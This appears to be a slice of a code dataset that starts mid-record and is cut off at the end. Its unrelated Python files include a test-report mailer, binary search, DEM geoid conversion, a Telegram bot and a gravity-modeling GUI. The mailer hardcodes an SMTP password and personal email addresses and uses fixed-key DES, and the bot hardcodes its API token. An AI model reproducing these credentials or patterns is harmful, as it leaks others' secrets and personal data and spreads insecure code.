DES加密\ndef desEncode(desStr):\n k = des('secretKEY', padmode=PAD_PKCS5)\n encodeStr = base64.b64encode(k.encrypt(json.dumps(desStr)))\n return encodeStr\n\n\n# 字典排序\ndef encodePostStr(postData):\n keyDict = {'key': 'secretKEY'}\n mergeDict = dict(postData, **keyDict)\n mergeDict = sorted(mergeDict.items())\n postStr = ''\n for i in mergeDict:\n postStr = postStr + i[0] + '=' + i[1] + '&'\n postStr = postStr[:-1]\n hashobj = hashlib.sha1()\n hashobj.update(postStr.encode('utf-8'))\n token = hashobj.hexdigest()\n postData['token'] = token\n return desEncode(postData)\n\n\n# 发送通知邮件\ndef sendMail(text):\n sender = '13990122270@163.com'\n receiver = ['huanglanting@kuaijiankang.com']\n mailToCc = ['738631563@qq.com']\n subject = '接口自动化测试报告通知'\n smtpserver = 'smtp.163.com'\n username = '13990122270@163.com'\n password = 'qwertyuioplmn123'\n\n msg = MIMEText(text, 'html', 'utf-8')\n msg['Subject'] = subject\n msg['From'] = sender\n msg['To'] = ';'.join(receiver)\n msg['Cc'] = ';'.join(mailToCc)\n try:\n smtp = smtplib.SMTP(smtpserver)\n # smtp.docmd(\"EHLO server\")\n # smtp.starttls()\n # smtp.EnableSsl = True\n # smtp.set_debuglevel(1)\n # smtp.connect(smtpserver)\n # smtp.docmd(\"AUTH LOGIN\")\n smtp.login(username, password)\n smtp.sendmail(sender, receiver + mailToCc, msg.as_string())\n print('email success!!!!!!!!!!')\n smtp.quit()\n except Exception as e: # 如果 try 中的语句没有执行,则���执行下面的 ret=False\n print(e)\n print('email wrong')\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"133484714","text":"def binary_search_iterative(array, left, right, x):\n while left <= right:\n mid = left + (right - left) // 2\n if x == array[mid]:\n return mid\n elif x > array[mid]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n\ndef binary_search_recursive(array, left, right, x):\n if left > right:\n return -1\n\n mid = left + (right - left) // 2\n\n if x == array[mid]:\n return mid\n elif x < array[mid]:\n return binary_search_recursive(array, left, mid - 1, x)\n else:\n return binary_search_recursive(array, mid + 1, right, x)","sub_path":"search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"444242545","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright 2015 David Lilien \n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\nTake a tiff in south polar stereographic, convert it to geoid reference using bedmap tif. \n\"\"\"\n\nimport argparse\nimport sys\nimport os\nimport re\nimport glob\nimport numpy as np\nfrom demtools.lib import malib\nfrom demtools.lib import warplib\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert file to the geoid')\n parser.add_argument('fn', type=str, help='File to convert')\n parser.add_argument('-o', type=str, help='File to convert', default=None)\n parser.add_argument('-geo', type=str, help='Geoid to wgs84 reference',\n default='/Users/dlilien/work/antarctica_general/bedmap2_tiff/gl04c_geiod_to_WGS84.tif')\n parser.add_argument('-inv', action='store_false',\n help='If true (default) conversion file starts as geoid')\n args = parser.parse_args()\n fn_list = [args.fn, args.geo]\n convert(fn_list, outprefix=args.o, inv=args.inv)\n\n\ndef convert(fn_list, outprefix=None, inv=True):\n dem1_fn = fn_list[0]\n dem2_fn = fn_list[1]\n\n # Might want to limit intersection to dem1 and dem2, as vmap could be\n # significantly smaller\n dem1_ds, dem2_ds = warplib.memwarp_multi_fn(\n fn_list, extent='first', res='min')\n\n outdir = os.path.split(dem1_fn)[0]\n if outprefix is None:\n outprefix = os.path.splitext(os.path.split(dem1_fn)[1])[0] + '_geo.tif'\n dst_fn = os.path.join(outdir, outprefix)\n else:\n dst_fn = outprefix\n # Load input DEMs into masked arrays\n print(\"Loading input DEMs into masked arrays\")\n dem1 = malib.ds_getma(dem1_ds, 1)\n dem2 = malib.ds_getma(dem2_ds, 1)\n\n print()\n\n adj = ''\n if '-adj' in dem1_fn:\n adj = '-adj'\n dem1_fn_base = re.sub(adj, '', os.path.splitext(dem1_fn)[0])\n dem2_fn_base = re.sub(adj, '', os.path.splitext(dem2_fn)[0])\n\n #dem1_geoid = geolib.dem_geoid(dem1_fn)\n #dem2_geoid = geolib.dem_geoid(dem1_fn)\n\n # Less restrictive basename\n #dem1_fn_base = os.path.splitext(dem1_fn)[0].split('_mos_')[0]+'_mos'\n #dem2_fn_base = os.path.splitext(dem2_fn)[0].split('_mos_')[0]+'_mos'\n # This works for SPIRIT products as well\n dem1_fn_base = os.path.join(\n os.path.split(dem1_fn)[0], os.path.split(dem1_fn)[-1][0:13])\n dem2_fn_base = os.path.join(\n os.path.split(dem2_fn)[0], os.path.split(dem2_fn)[-1][0:13])\n\n def findfile(base_fn, ext):\n fn = glob.glob(base_fn + '*' + ext)\n if not fn:\n fn = None\n else:\n fn = fn[0]\n return fn\n\n tidecorr = True\n if tidecorr:\n #dem1_tide_fn = dem1_fn_base+'_tidecorr.tif'\n #dem2_tide_fn = dem2_fn_base+'_tidecorr.tif'\n dem1_tide_fn = findfile(dem1_fn_base, 'tidecorr.tif')\n if not dem1_tide_fn:\n dem1_tide_fn = findfile(\n dem1_fn_base, 'tidemodel_smooth_full_clip.tif')\n dem2_tide_fn = findfile(dem2_fn_base, 'tidecorr.tif')\n if not dem2_tide_fn:\n dem2_tide_fn = findfile(\n dem2_fn_base, 'tidemodel_smooth_full_clip.tif')\n if dem1_tide_fn and dem2_tide_fn:\n dem1_tide_ds, dem2_tide_ds = warplib.memwarp_multi_fn(\n [dem1_tide_fn, dem2_tide_fn], extent=dem1_ds, res=dem1_ds)\n dem1_tide = malib.ds_getma(dem1_tide_ds)\n dem2_tide = malib.ds_getma(dem2_tide_ds)\n tide_diff = dem2_tide - dem1_tide\n dst_fn = os.path.join(outdir, outprefix + '_tide_diff.tif')\n malib.writeGTiff(tide_diff, dst_fn, dem1_ds)\n # These values are tide prediction, to remove, want to subtract from observed elevation\n # Need to fill with 0 to prevent clipping to floating ice\n dem1 -= dem1_tide.filled(0)\n dem2 -= dem2_tide.filled(0)\n\n firnair = True\n # This is constant value for PIG\n dem1_firnair = 15.0\n dem2_firnair = dem1_firnair\n firnair_diff = dem2_firnair - dem1_firnair\n if firnair:\n #dem1_firnair_fn = dem1_fn_base+'_racmo_FirnAir.tif'\n #dem2_firnair_fn = dem2_fn_base+'_racmo_FirnAir.tif'\n dem1_firnair_fn = findfile(dem1_fn_base, 'racmo_FirnAir.tif')\n dem2_firnair_fn = findfile(dem2_fn_base, 'racmo_FirnAir.tif')\n if dem1_firnair_fn and dem2_firnair_fn:\n dem1_firnair_ds, dem2_firnair_ds = warplib.memwarp_multi_fn(\n [dem1_firnair_fn, dem2_firnair_fn], extent=dem1_ds, res=dem1_ds)\n dem1_firnair = malib.ds_getma(dem1_firnair_ds)\n dem2_firnair = malib.ds_getma(dem2_firnair_ds)\n firnair_diff = dem2_firnair - dem1_firnair\n dst_fn = os.path.join(outdir, outprefix + '_FirnAir_diff.tif')\n malib.writeGTiff(firnair_diff, dst_fn, dem1_ds)\n # These values are positive, total firn air content, want to subtract\n #dem1 -= dem1_firnair\n #dem2 -= dem2_firnair\n\n zs = True\n zs_diff = 0\n if zs:\n #dem1_zs_fn = dem1_fn_base+'_racmo_zs.tif'\n #dem2_zs_fn = dem2_fn_base+'_racmo_zs.tif'\n dem1_zs_fn = findfile(dem1_fn_base, 'racmo_zs.tif')\n dem2_zs_fn = findfile(dem2_fn_base, 'racmo_zs.tif')\n if dem1_zs_fn and dem2_zs_fn:\n dem1_zs_ds, dem2_zs_ds = warplib.memwarp_multi_fn(\n [dem1_zs_fn, dem2_zs_fn], extent=dem1_ds, res=dem1_ds)\n dem1_zs = malib.ds_getma(dem1_zs_ds)\n dem2_zs = malib.ds_getma(dem2_zs_ds)\n zs_diff = dem2_zs - dem1_zs\n dst_fn = os.path.join(outdir, outprefix + '_zs_diff.tif')\n malib.writeGTiff(zs_diff, dst_fn, dem1_ds)\n #dst_fn = os.path.join(outdir, outprefix+'_smb_diff.tif')\n #malib.writeGTiff(smb_diff, dst_fn, dem1_ds)\n\n # Check to make sure inputs actually intersect\n # Masked pixels are True\n if not np.any(~dem1.mask * ~dem2.mask):\n sys.exit(\"No valid overlap between input data\")\n\n # Compute common mask\n print(\"Generating common mask\")\n common_mask = malib.common_mask([dem1, dem2])\n\n # Compute relative elevation difference with Eulerian approach\n print(\"Computing elevation difference with Eulerian approach\")\n if inv:\n diff_euler = np.ma.array(dem1 - dem2, mask=common_mask)\n else:\n diff_euler = np.ma.array(dem2 + dem1, mask=common_mask)\n\n if True:\n print(\"Writing Eulerian elevation difference map\")\n print(dst_fn)\n malib.writeGTiff(diff_euler, dst_fn, dem1_ds)\n\nif __name__ == '__main__':\n main()\n","sub_path":"modeltools/bin/sps2geoid.py","file_name":"sps2geoid.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"457361071","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport re\nimport csv\n\ndf = pd.read_csv('dataset.csv')\ncorrMatrix = df.corr()\nprint(corrMatrix)\nplt.matshow(corrMatrix)\nplt.show()\n\nx = []\ny = []\n\nwith open(\"dataset.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n x.append([round(float(\"0.\"+re.sub(\"\\D\",\"\",x)[1:]), 2) for x in row[:10]])\n y.append(round(float(\"0.\"+re.sub(\"\\D\",\"\",row[10])[1:]), 2))\n\nplt.plot(x)\nplt.show()\n","sub_path":"Lab 8/Other/correlationMatrix.py","file_name":"correlationMatrix.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"606673934","text":"import os\nimport logging\nfrom networkx.utils import on_production_server\n\n# Load the settings file from the selected environment\n# eg if locally `NETWORKX_ENV` is set to 'ardvark_party' then we would\n# attempt to load the settings file `conf/ardvark_party.py`\n# If the app is deployed as someapp.appspot.com then we would\n# attempt to load the settings file `conf/someapp.py\n# If NETWORKX_ENV is not set, and it's not on a production server, then\n# env_name is 'dev' and setting are loaded from 'networkx/conf/dev.py'\n\n# Get the current networkx environment name and default to 'dev' if none set.\nenv_name = os.environ.get('NETWORKX_ENV', 'dev')\n\n# If were on the production server, then use the enviroment settings file that\n# corresponds to the appid.\nif on_production_server:\n from google.appengine.api.app_identity import get_application_id\n env_name = get_application_id().lower()\n\n# Construct the path\nif env_name.startswith('google.com:'):\n env_name = env_name.replace('google.com:', '')\n settings_path = os.path.join('networkx', 'conf', 'google', '%s.py' % env_name)\nelse:\n settings_path = os.path.join('networkx', 'conf', '%s.py' % env_name)\n\n# Execute the path to the environment setting file\nif not os.path.exists(settings_path):\n logging.error('Settings file named %s does not exist (env_name is %s)' % \\\n (settings_path, env_name))\n exit(1)\nelse:\n logging.info('Env %s' % env_name)\n execfile(settings_path)\n\n\n# If the app is not deployed then allow importing of a `local_settings.py`\n# file to allow some customization, eg custom logging settings etc..\n# if not on_production_server:\n # try:\n # from settings_local import *\n # except ImportError as e:\n # logging.info('NOTE: no local_settings.py file set: %s' % e)\n","sub_path":"networkx-d3-v2/networkx/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"425523027","text":"import sys\nimport imp\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm import TocMachine\n\n\nAPI_TOKEN = '505050164:AAGxd3RICtZh9A36aTgnygxheiabZIQJRs0'\nWEBHOOK_URL = 'https://df48770a.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n states=[\n 'user',\n 'drink',\n 'food',\n\t'play',\n\t'drinkname1',\n 'drinkname2',\n\t'drinkname3',\n\t'drinkname4',\n\t'drinkname5',\n\t'foodname1',\n\t'foodname2',\n 'foodname3',\n\t'foodname4',\n\t'foodname5',\n\t'zero',\n\t'mid',\n\t'high'\n ],\n transitions=[\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'drink',\n 'conditions': 'is_going_to_drink'\n },\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'food',\n 'conditions': 'is_going_to_food'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'play',\n 'conditions': 'is_going_to_play'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname1',\n 'conditions': 'is_going_to_drinkname1'\n },\n {\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname2',\n 'conditions': 'is_going_to_drinkname2'\n },\n {\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname3',\n 'conditions': 'is_going_to_drinkname3'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname4',\n 'conditions': 'is_going_to_drinkname4'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname5',\n 'conditions': 'is_going_to_drinkname5'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname1',\n 'conditions': 'is_going_to_foodname1'\n },\n {\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname2',\n 'conditions': 'is_going_to_foodname2'\n },\n {\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname3',\n 'conditions': 'is_going_to_foodname3'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname4',\n 'conditions': 'is_going_to_foodname4'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname5',\n 'conditions': 'is_going_to_foodname5'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'zero',\n 'conditions': 'is_going_to_zero'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'mid',\n 'conditions': 'is_going_to_mid'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'high',\n 'conditions': 'is_going_to_high'\n },\n {\n 'trigger': 'go_back',\n 'source': [\n 'drink',\n 'food',\n\t\t'play',\n\t\t'drinkname1',\n\t\t'drinkname2',\n 'drinkname3',\n\t\t'drinkname4',\n\t\t'drinkname5',\n\t\t'foodname1',\n\t\t'foodname2',\n 'foodname3',\n\t\t'foodname4',\n\t\t'foodname5',\n\t\t'zero',\n\t\t'mid',\n\t\t'high'\n ],\n 'dest': 'user'\n }\n ],\n initial='user',\n auto_transitions=False,\n show_conditions=True,\n)\n\n\ndef _set_webhook():\n status = bot.set_webhook(WEBHOOK_URL)\n if not status:\n print('Webhook setup failed')\n sys.exit(1)\n else:\n print('Your webhook URL has been set to \"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n machine.advance(update)\n return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n byte_io = BytesIO()\n machine.graph.draw(byte_io, prog='dot', format='png')\n byte_io.seek(0)\n return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n _set_webhook()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"583947338","text":"\"\"\"\nSimple GUIs using the interactive capabilities of :mod:`matplotlib`\n\n**Interactive gravimetric modeling**\n\n* :class:`~fatiando.gui.simple.Moulder`\n* :class:`~fatiando.gui.simple.BasinTrap`\n* :class:`~fatiando.gui.simple.BasinTri`\n\n**Interactive modeling of layered media**\n\n* :class:`~fatiando.gui.simple.Lasagne`\n\n----\n\n\"\"\"\nimport bisect\n\nimport numpy\nfrom matplotlib import pyplot, widgets\n\nfrom .. import utils\nfrom ..gravmag import talwani\nfrom ..mesher import Polygon\nfrom ..seismic import profile\n\n\nclass Moulder():\n\n \"\"\"\n Interactive potential field direct modeling in 2D using polygons.\n\n Uses module :mod:`~fatiando.gravmag.talwani` for computations.\n\n For the moment only works for the gravity anomaly.\n\n To run this in a script, use::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Create the application\n app = Moulder(area, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"The truth is out there\"\n\n \"\"\"\n\n instructions = '-'.join([\"Click to start drawing\",\n \"Choose density using the slider\",\n \"Right click to close polygon\",\n \"'e' to delete\"])\n name = \"Moulder - Direct gravimetric modeling\"\n\n def __init__(self, area, xp, zp, gz=None):\n if len(zp) != len(xp):\n raise ValueError(\"xp and zp must have same size\")\n # Get the data\n self.area = area\n self.x1, self.x2, z1, z2 = 0.001 * numpy.array(area)\n if gz is not None:\n if len(gz) != len(xp):\n raise ValueError(\"xp, zp and gz must have same size\")\n self.gz = numpy.array(gz)\n else:\n self.gz = gz\n self.xp = numpy.array(xp, dtype='f')\n self.zp = numpy.array(zp, dtype='f')\n # Make the figure\n self.fig = pyplot.figure(figsize=(12, 8))\n self.fig.canvas.set_window_title(self.name)\n self.fig.suptitle(self.instructions)\n self.draw = self.fig.canvas.draw\n # Make the data and model canvas\n self.dcanvas = self.fig.add_subplot(2, 1, 1)\n self.dcanvas.set_ylabel(\"mGal\")\n self.dcanvas.set_xlim(self.x1, self.x2)\n self.dcanvas.grid()\n self.mcanvas = self.fig.add_subplot(2, 1, 2)\n self.mcanvas.set_ylabel(\"Depth (km)\")\n self.mcanvas.set_xlabel(\"x (km)\")\n self.mcanvas.set_xlim(self.x1, self.x2)\n self.mcanvas.set_ylim(z2, z1)\n self.mcanvas.grid()\n self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.18,\n hspace=0.1)\n # Make the sliders\n sliderax = self.fig.add_axes([0.20, 0.08, 0.60, 0.03])\n self.densslider = widgets.Slider(sliderax, 'Density',\n -9, 9, valinit=0.,\n valfmt='%1.2f (g/cm3)')\n sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])\n self.errslider = widgets.Slider(sliderax, 'Error',\n 0, 5, valinit=0.,\n valfmt='%1.2f (mGal)')\n # Initialize the data\n self.leg = None\n self.predgz = None\n self.predplot, = self.dcanvas.plot([], [], '-r', linewidth=2)\n if self.gz is not None:\n self.gzplot, = self.dcanvas.plot(xp * 0.001, gz, 'ok')\n self.nextdens = 1000.\n self.densslider.set_val(self.nextdens * 0.001)\n self.error = 0.\n self.densities = []\n self.polygons = []\n self.nextpoly = []\n self.plotx = []\n self.ploty = []\n self.polyplots = []\n self.polyline, = self.mcanvas.plot([], [], marker='o', linewidth=2)\n\n def run(self):\n # Connect the event handlers\n self.picking = False\n self.connect()\n self.update()\n pyplot.show()\n\n def get_data(self):\n return self.predgz\n\n def savedata(self, fname):\n data = numpy.array([self.xp, self.zp, self.predgz]).T\n numpy.savetxt(fname, data, fmt='%.5f')\n\n def connect(self):\n self.densslider.on_changed(self.set_density)\n self.errslider.on_changed(self.set_error)\n self.fig.canvas.mpl_connect('button_press_event', self.pick)\n self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n self.fig.canvas.mpl_connect('motion_notify_event', self.move)\n\n def update(self):\n if self.polygons:\n polys = []\n for p, d in zip(self.polygons, self.densities):\n polys.append(Polygon(1000. * numpy.array(p), {'density': d}))\n self.predgz = utils.contaminate(\n talwani.gz(self.xp, self.zp, polys), self.error)\n else:\n self.predgz = numpy.zeros_like(self.xp)\n self.predplot.set_data(self.xp * 0.001, self.predgz)\n if self.gz is not None:\n ymin = min(self.predgz.min(), self.gz.min())\n ymax = max(self.predgz.max(), self.gz.max())\n else:\n ymin = self.predgz.min()\n ymax = self.predgz.max()\n if ymin != ymax:\n self.dcanvas.set_ylim(ymin, ymax)\n self.draw()\n\n def set_density(self, value):\n self.nextdens = 1000. * value\n\n def set_error(self, value):\n self.error = value\n self.update()\n\n def move(self, event):\n pass\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n self.picking = True\n self.nextpoly.append([x, y])\n self.plotx.append(x)\n self.ploty.append(y)\n self.polyline.set_data(self.plotx, self.ploty)\n self.draw()\n if event.button == 3 or event.button == 2:\n if len(self.nextpoly) >= 3:\n self.polygons.append(self.nextpoly)\n self.densities.append(float(self.nextdens))\n self.update()\n self.picking = False\n self.plotx.append(self.nextpoly[0][0])\n self.ploty.append(self.nextpoly[0][1])\n self.polyline.set_data(self.plotx, self.ploty)\n fill, = self.mcanvas.fill(self.plotx, self.ploty,\n color=self.polyline.get_color(),\n alpha=0.5)\n self.polyline.set_label('%1.2f' % (0.001 * self.nextdens))\n self.legend()\n self.draw()\n self.polyplots.append([self.polyline, fill])\n self.plotx, self.ploty = [], []\n self.nextpoly = []\n self.polyline, = self.mcanvas.plot([], [], marker='o',\n linewidth=2)\n\n def legend(self):\n self.leg = self.mcanvas.legend(loc='lower right', numpoints=1,\n prop={'size': 9})\n self.leg.get_frame().set_alpha(0.5)\n\n def key_press(self, event):\n if event.key == 'e':\n if self.picking:\n if len(self.nextpoly) == 0:\n self.picking = False\n self.legend()\n self.draw()\n return 0\n self.nextpoly.pop()\n self.plotx.pop()\n self.ploty.pop()\n self.polyline.set_data(self.plotx, self.ploty)\n else:\n if len(self.polygons) == 0:\n return 0\n self.polygons.pop()\n self.densities.pop()\n line, fill = self.polyplots.pop()\n line.remove()\n fill.remove()\n self.update()\n self.draw()\n\n\nclass BasinTrap(Moulder):\n \"\"\"\n Interactive gravity modeling using a trapezoidal model.\n\n The trapezoid has two surface nodes with fixed position. The bottom two\n have fixed x coordinates but movable z. The x coordinates for the bottom\n nodes are the same as the ones for the surface nodes. The user can then\n model by controling the depths of the two bottom nodes.\n\n Example::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Where the two surface nodes are. Use depth = 1 because direct\n # modeling doesn't like it when the model and computation points\n # coincide\n nodes = [[100, 1], [900, 1]]\n # Create the application\n app = BasinTrap(area, nodes, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward.\n * nodes : list of lists = [[x1, z1], [x2, z2]]\n x and z coordinates of the two top nodes. Must be in clockwise order!\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set node depth - Right click to change nodes\"\n name = \"BasinTrap\"\n\n def __init__(self, area, nodes, xp, zp, gz=None):\n Moulder.__init__(self, area, xp, zp, gz)\n left, right = numpy.array(nodes) * 0.001\n z1 = z2 = 0.001 * 0.5 * (area[3] - area[2])\n self.polygons = [[left, right, [right[0], z1], [left[0], z2]]]\n self.nextdens = -1000\n self.densslider.set_val(self.nextdens * 0.001)\n self.densities = [self.nextdens]\n self.plotx = [v[0] for v in self.polygons[0]]\n self.plotx.append(left[0])\n self.ploty = [v[1] for v in self.polygons[0]]\n self.ploty.append(left[1])\n self.polyline.set_data(self.plotx, self.ploty)\n self.polyline.set_color('k')\n self.isleft = True\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def draw_guide(self, x, z):\n if self.isleft:\n x0, z0 = self.polygons[0][3]\n x1, z1 = self.polygons[0][2]\n else:\n x0, z0 = self.polygons[0][2]\n x1, z1 = self.polygons[0][3]\n self.guide.set_data([x0, x0, x1], [z0, z, z1])\n\n def move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def set_density(self, value):\n self.densities[0] = 1000. * value\n self.update()\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n if self.isleft:\n self.polygons[0][3][1] = y\n self.ploty[3] = y\n else:\n self.polygons[0][2][1] = y\n self.ploty[2] = y\n self.polyline.set_data(self.plotx, self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n if event.button == 3 or event.button == 2:\n self.isleft = not self.isleft\n self.draw_guide(x, y)\n self.draw()\n\n def key_press(self, event):\n pass\n\n\nclass BasinTri(Moulder):\n \"\"\"\n Interactive gravity modeling using a triangular model.\n\n The triangle has two surface nodes with fixed positions. The user can then\n model by controling the bottom node.\n\n Example::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Where the two surface nodes are. Use depth = 1 because direct\n # modeling doesn't like it when the model and computation points\n # coincide\n nodes = [[100, 1], [900, 1]]\n # Create the application\n app = BasinTri(area, nodes, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward.\n * nodes : list of lists = [[x1, z1], [x2, z2]]\n x and z coordinates of the two top nodes. Must be in clockwise order!\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set node location\"\n name = \"BasinTri\"\n\n def __init__(self, area, nodes, xp, zp, gz=None):\n Moulder.__init__(self, area, xp, zp, gz)\n left, right = numpy.array(nodes) * 0.001\n z = 0.001 * 0.5 * (area[3] - area[2])\n x = 0.5 * (right[0] + left[0])\n self.polygons = [[left, right, [x, z]]]\n self.nextdens = -1000\n self.densslider.set_val(self.nextdens * 0.001)\n self.densities = [self.nextdens]\n self.plotx = [v[0] for v in self.polygons[0]]\n self.plotx.append(left[0])\n self.ploty = [v[1] for v in self.polygons[0]]\n self.ploty.append(left[1])\n self.polyline.set_data(self.plotx, self.ploty)\n self.polyline.set_color('k')\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def draw_guide(self, x, z):\n x0, z0 = self.polygons[0][0]\n x1, z1 = self.polygons[0][1]\n self.guide.set_data([x0, x, x1], [z0, z, z1])\n\n def move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def set_density(self, value):\n self.densities[0] = 1000. * value\n self.update()\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n self.polygons[0][2] = [x, y]\n self.plotx[2] = x\n self.ploty[2] = y\n self.polyline.set_data(self.plotx, self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n\n def key_press(self, event):\n pass\n\n\nclass Lasagne():\n\n \"\"\"\n Interactive modeling of vertical seismic profiling for 1D layered media.\n\n The wave source is assumed to be on the surface of a vertical borehole. The\n receivers are at given depths. What is measured is the travel-time of\n first arrivals.\n\n Assumes that the thickness of the layers are known. The user then only\n needs to choose the velocities.\n\n Example::\n\n # Define the thickness of the layers\n thickness = [10, 20, 5, 10]\n # Define the measuring points along the well\n zp = range(1, sum(thickness), 1)\n # Define the velocity range\n vmin, vmax = 1, 10000\n # Run the application\n app = Lasagne(thickness, zp, vmin, vmax)\n app.run()\n # Save the modeled data\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * thickness : list\n The thickness of each layer in order of increasing depth\n * zp : list\n The depths of the measurement stations (seismometers)\n * vmin, vmax : float\n Range of velocities to allow\n * tts : array\n The observed travel-time values at the measurement stations. Will be\n plotted as black points together with the modeled (predicted) data.\n If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set the velocity of the layers\"\n name = \"Lasagne - Vertical seismic profiling for 1D layered media\"\n\n def __init__(self, thickness, zp, vmin, vmax, tts=None):\n if tts is not None:\n if len(tts) != len(zp):\n raise ValueError(\"zp and tts must have same size\")\n if vmin <= 0. or vmax <= 0.:\n raise ValueError(\"Can't have velocity vmin or vmax <= 0\")\n self.tts = tts\n self.zp = zp\n self.thickness = thickness\n # Make the figure\n self.fig = pyplot.figure(figsize=(14, 8))\n self.fig.canvas.set_window_title(self.name)\n self.fig.suptitle(self.instructions)\n self.draw = self.fig.canvas.draw\n # Make the data and model canvas\n self.dcanvas = self.fig.add_subplot(1, 2, 1)\n self.dcanvas.set_ylabel(\"Depth (m)\")\n self.dcanvas.set_xlabel(\"Travel-time (s)\")\n self.dcanvas.set_ylim(sum(thickness), 0)\n self.dcanvas.grid()\n self.dcanvas.set_ylim(sum(thickness), 0)\n self.mcanvas = 